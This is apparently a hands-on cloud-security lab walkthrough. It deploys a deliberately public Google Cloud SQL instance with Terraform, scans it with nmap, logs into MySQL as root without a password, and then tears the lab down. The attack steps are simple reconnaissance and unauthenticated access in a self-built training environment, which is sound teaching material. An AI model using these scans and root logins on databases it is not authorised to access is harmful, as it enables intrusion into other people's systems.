Attacking SQL Instance
In order to start the scenario go to the scenario-2
folder by typing the below command in the shell
cd scenario-2
Export the project ID by typing the below command in the GCLOUD Shell
export PROJECT_ID="project-id"
replace the
project-id
with your project ID
Next configure the gcloud
to use the project by typing the below command in the shell
gcloud config set project $PROJECT_ID
Next enable the Cloud SQL Admin API
by typing the below command in the shell
gcloud services enable sqladmin.googleapis.com
Next initialize the terraform by typing the below command in the shell
terraform init
Next apply the terraform by typing the below command in the shell
terraform apply -auto-approve -var project-id=$PROJECT_ID
Note This will take some time to create the resources be patient 🧘
Once it is done note the ip-address of the SQL Instance
from the terraform output
Scenario info
Google SQL allows developers to set up the database without any hassle by default the database can be accessed only within the authorized network but during debugging the database sometimes the user may open the database to the public for easy debugging In this Scenario the attacker gets to know to about the public-facing SQL Instance
Solution
First we are going to perform some reconnaissance
on the Instance
using nmap, in order to do that we need to first install nmap
in the GCLOUD Shell
by typing the below command in the shell
sudo apt-get install nmap -y
Next run the nmap scan by typing the below command in the shell
nmap -Pn <SQL INSTANCE IP>
Running Nmap
Scan on the IP reveals that MySQL
service was running on the given instance
mysql -u root -h <ip>
Note This scenario assumes there was no authentication for the database , but in real world may find some weak credentials
Enter \q
to exit the database
Clean up
To clean up the Scenario
type the below command in the GCLOUD Shell
terraform destroy -auto-approve -var project-id=$PROJECT_ID